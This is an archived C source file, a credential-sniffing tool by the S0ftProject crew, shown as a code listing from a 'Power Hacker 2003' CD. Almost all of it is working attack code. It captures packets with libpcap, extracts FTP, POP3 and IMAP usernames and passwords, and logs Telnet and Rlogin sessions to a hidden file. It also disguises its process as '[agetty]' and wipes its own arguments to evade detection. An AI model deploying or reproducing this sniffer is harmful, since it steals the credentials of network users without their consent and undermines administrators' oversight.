home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / s0ftpj / SPJY2Ksniff.c < prev    next >
Encoding:
C/C++ Source or Header  |  2000-12-17  |  8.1 KB  |  304 lines
  1. /************************************************************************
  2. * Special Y2K Newbie Gift From S0ftProject Crew http://www.s0ftpj.org/    *
  3. * ---------------------------------------------------------------------    *
  4. * SPJY2Ksniff                                *
  5. *             Sniffer di rete per operare attacchi di tipo    *
  6. *            passivo ed evidenziare lacune nella protezione    *
  7. *            del proprio traffico di LAN. Fa uso della lib    *
  8. *            pcap(3) per accedere allo strato datalink.    *
  9. *            Questo vuol dire che la libreria deve essere    *
  10. *            presente, con i suoi header a disposizione del    *
  11. *            preprocessore.                    *
  12. *                                    *
  13. *            Compilate con:                    *
  14. *                 gcc -o SPJY2Ksniff SPJ2Ksniff.c -lpcap    *    
  15. *                                    *
  16. *                             FuSyS [S0ftPj|BFi]    *
  17. *                         http://www.s0ftpj.org/    *
  18. *                                    *
  19. ************************************************************************/
  20.  
  21. /*
  22.  * Cosa vuol dire Newbie Version ? Due cose:
  23.  * 1) questo sniffer lavora CON PRECISIONE solo su FTP, POP3 ed IMAP. Per altri
  24.  *    protocolli si basa sul conteggio dei byte inviati. Questo funziona bene
  25.  *    per Telnet e Rlogin, ma non e' altrettanto parsimonioso per i log.
  26.  * 2) usa gli include di Linux. Dovrete trovare voi il modo per usarlo su altri
  27.  *    UNIX. Ovviamente c'e' e NON e' difficile =;)
  28.  *
  29.  * NB: RICORDATEVI DI LIBPCAP !
  30.  *                            FuSyS
  31.  */
  32.  
  33. #include <netdb.h>
  34. #include <stdlib.h>
  35. #include <unistd.h>
  36. #include <stdio.h>
  37. #include <string.h>
  38. #include <ctype.h>
  39. #include <getopt.h>
  40. #include <netinet/in.h>
  41. #include <netinet/ip.h>
  42. #include <netinet/tcp.h>
  43. #include <net/if.h>
  44. #include <pcap/pcap.h>
  45. #include <signal.h>
  46.  
  47. #define         MTU                     1500
  48. #define     SNAPLEN            8*1024
  49. #define        MAXCONN            10
  50. #define         LOGFILE            ".NEWBIESNIFF"
  51. #define        IPHDR            sizeof(struct iphdr)
  52. #define     TCPHDR            sizeof(struct tcphdr)
  53.  
  54. int IFFHDR, i, S, iplen, tcplen;
  55. struct pcap *pcap_s;
  56. struct pcap_pkthdr pcap_h;
  57. unsigned char *buf, *saddr, *daddr;
  58. struct iphdr *ip;
  59. struct tcphdr *tcp;
  60. char *payload, buff[SNAPLEN];
  61. FILE *logs;
  62. struct conn {
  63.         unsigned long saddr;
  64.         unsigned long daddr;
  65.         unsigned short src;
  66.         unsigned short dst;
  67.     unsigned long seq;
  68. };
  69. struct conn *theft[MAXCONN];
  70.  
  71. void uso(char *name)
  72. {
  73.     printf("\n");
  74.     printf("\033[1;32mSPJY2Ksniff"); 
  75.     printf("\033[1;34m - Special Newbie Gift Version\n");
  76.     printf("Y2K Gift From \033[1;32mS0ftProject \033[1;34mCrew"); 
  77.     printf(" - http://www.s0ftpj.org/\n");
  78.     printf("Code by FuSyS [S0ftPj|BFi] <fusys@s0ftpj.org>\n\n");
  79.     printf("Use: %s -i <device di rete>\033[0m\n\n", name);
  80. }
  81.  
  82. void iffclose()
  83. {
  84.     pcap_close(pcap_s);
  85.     fclose(logs);
  86.     exit(13);
  87. }
  88.  
  89. void delc()
  90. {
  91.         for(S=0;S<MAXCONN;S++)
  92.            if(theft[S]!=NULL)
  93.                 if(ip->saddr==theft[S]->saddr && ip->daddr==theft[S]->daddr
  94.                 && tcp->source==theft[S]->src && tcp->dest==theft[S]->dst){
  95.                         free(theft[S]);
  96.             theft[S]=NULL;
  97.                 }
  98. }
  99.  
  100. int addc()
  101. {
  102.         for(S=0;S<MAXCONN;S++){
  103.             if(theft[S]!=NULL)
  104.                 if(ip->saddr==theft[S]->saddr && ip->daddr==theft[S]->daddr
  105.                 && tcp->source==theft[S]->src && tcp->dest==theft[S]->dst){
  106.                         return(1);
  107.                 }
  108.         }
  109.         for(S=0;S<MAXCONN;S++){
  110.                 if(theft[S]==NULL){
  111.                 theft[S]=calloc(1, sizeof(struct conn));
  112.                 theft[S]->saddr=ip->saddr;
  113.                 theft[S]->daddr=ip->daddr;
  114.                 theft[S]->src=tcp->source;
  115.                 theft[S]->dst=tcp->dest;
  116.         theft[S]->seq=tcp->seq;
  117.                 return(0);
  118.                 }
  119.         }
  120.         return(0);
  121. }
  122.  
  123. void dumpip()
  124. {
  125.     saddr=(unsigned char*)&(ip->saddr);
  126.            daddr=(unsigned char*)&(ip->daddr);
  127.            fprintf(logs, "\n-=[ %u.%u.%u.%u:%d <-> %u.%u.%u.%u:%d ]=-\n",
  128.                saddr[0], saddr[1], saddr[2], saddr[3],
  129.                    ntohs(tcp->source), daddr[0], daddr[1], daddr[2],
  130.                    daddr[3], ntohs(tcp->dest));
  131.         fflush(logs);
  132. }
  133.  
  134. void dumper()
  135. {    
  136.     memset(buff,0,sizeof(buff));
  137.     for(i=0;i<pcap_h.len-(IFFHDR+iplen+tcplen);i++){
  138.             if(isprint(payload[i]))buff[i]=payload[i];
  139.                 else if(buff[i]=='\r'||buff[i]=='\n')buff[i]='\n';
  140.         else buff[i]='.';
  141.     }
  142.     if(!addc())dumpip();
  143.     if(!tcp->rst && !tcp->fin){
  144.         if((ntohl(tcp->seq)-ntohl(theft[S]->seq)<100))
  145.             fprintf(logs, "%s", buff);
  146.     }
  147.     else delc();
  148.     fflush(logs);
  149. }
  150.  
  151. void sniff()
  152. {
  153.         switch(ntohs(tcp->dest))
  154.         {
  155.                 case 21:
  156.                         if(strstr(payload,"USER")||strstr(payload,"PASS")){
  157.                 strncpy(buff, payload, 32);
  158.                                 dumpip();
  159.                 for(i=0;i<strlen(buff);i++){
  160.                    if(isprint(buff[i]))fputc(buff[i], logs);
  161.                    else if(buff[i]=='\r'||buff[i]=='\n'){
  162.                     fflush(logs);
  163.                     return;
  164.                    }
  165.                 }
  166.                         }
  167.             break;
  168.         /* tutto il resto, volendo */
  169.                 case 23:
  170.         case 513:
  171.             dumper();
  172.                         break;
  173.         /* fine dumper polivalente */
  174.         case 110:
  175.                         if(strstr(payload,"user")||strstr(payload,"pass")
  176.              ||strstr(payload,"USER")||strstr(payload,"PASS")){
  177.                                 strncpy(buff, payload, 32);
  178.                                 dumpip();
  179.                                 for(i=0;i<strlen(buff);i++){
  180.                                    if(isprint(buff[i]))fputc(buff[i], logs);
  181.                                    else if(buff[i]=='\r'||buff[i]=='\n'){
  182.                                         fflush(logs);
  183.                                         return;
  184.                                    }
  185.                                 }
  186.                         }
  187.                         break;
  188.         case 143:
  189.         case 220:
  190.             if(strstr(payload,"authenticate") ||
  191.                strstr(payload,"AUTHENTICATE")){
  192.                 strncpy(buff, payload, 80);
  193.                 dumpip();
  194.                                 for(i=0;i<strlen(buff);i++){
  195.                                    if(isprint(buff[i]))fputc(buff[i], logs);
  196.                                    else if(buff[i]=='\r'||buff[i]=='\n'){
  197.                                         fflush(logs);
  198.                                         return;
  199.                                    }
  200.                                 }
  201.                         }
  202.                         break;
  203.         }
  204. }
  205.  
  206. void nethunt()
  207. {
  208.     ip=(struct iphdr*)(buf+IFFHDR);
  209.     iplen=(ip->ihl<<2);
  210.     if(ip->protocol != 6) return;
  211.     tcp=(struct tcphdr*)(buf+IFFHDR+iplen);
  212.     tcplen=(tcp->doff<<2);
  213.     payload=(char *)(buf+IFFHDR+iplen+tcplen);
  214.     sniff();
  215. }
  216.  
  217. int main(int argc, char **argv)
  218. {
  219.     char iff[10], ebuf[255];
  220.     char *fakeargv="[agetty]";
  221.     int opt;
  222.  
  223.     if(argc<2) {
  224.         uso(argv[0]);
  225.         exit(0);
  226.     }
  227.  
  228.     if(getuid()){
  229.         fprintf(stderr, "Spiacente, ma devi essere root\n");
  230.         exit(1);
  231.     }
  232.  
  233.     while ((opt = getopt(argc, argv, "i:")) != EOF) {
  234.             switch(opt)
  235.         {
  236.             case 'i':
  237.                 strncpy(iff, optarg, 10);    
  238.                 break;
  239.             default:
  240.                 exit(0);
  241.                 break;
  242.         }
  243.     }
  244.  
  245.     if((pcap_s=pcap_open_live(iff, SNAPLEN, 1, 1000, ebuf))==NULL) {
  246.         fprintf(stderr, "Impossibile Aprire il Dispositivo Pcap\n");
  247.         exit(17);
  248.     }
  249.  
  250.     switch(pcap_datalink(pcap_s))
  251.     {
  252.         case DLT_NULL: 
  253.             IFFHDR = 4;
  254.             break;
  255.         case DLT_EN10MB:
  256.             case DLT_EN3MB:
  257.                   IFFHDR = 14;
  258.                   break;
  259.             case DLT_PPP:
  260.                   IFFHDR = 4;
  261.                   break;
  262.             case DLT_SLIP:
  263.                   IFFHDR = 16;
  264.                   break;
  265.             case DLT_FDDI:
  266.                   IFFHDR = 21;
  267.                   break;
  268.             case DLT_RAW:
  269.                   IFFHDR = 0;
  270.                   break;
  271.             default:
  272.             fprintf(stderr, "Dispositivo Sconosciuto !\n");
  273.             exit(17);
  274.             break;
  275.     }        
  276.  
  277.     if((logs=fopen(LOGFILE, "a"))==NULL) {
  278.         fprintf(stderr, "Impossibile Aprire il File di Log\n");
  279.         exit(17);
  280.     }
  281.  
  282.     signal(SIGINT, iffclose);
  283.         signal(SIGTERM, iffclose);
  284.         signal(SIGKILL, iffclose);
  285.         signal(SIGQUIT, iffclose);
  286.  
  287.         printf("\n\033[1;32mSPJY2Ksniff\033[1;34m Newbie Gift Version from");
  288.         printf("\033[1;32m S0ftProject Crew\n");
  289.         printf("-----------------------------");
  290.         printf("------------------------\033[0m\n");
  291.         fflush(stdout);
  292.  
  293.     memset(argv[0], '\0', strlen(argv[0])+1);
  294.         strncpy(argv[0], fakeargv, strlen(fakeargv));
  295.     memset(argv[1], '\0', strlen(argv[1])+1);
  296.     memset(argv[2], '\0', strlen(argv[2])+1);
  297.  
  298.     while(1) {
  299.         buf=(u_char *)pcap_next(pcap_s, &pcap_h);
  300.         if(buf!=NULL && (pcap_h.len - IFFHDR) >= IPHDR) nethunt();
  301.     }
  302.     exit(0);
  303. }
  304.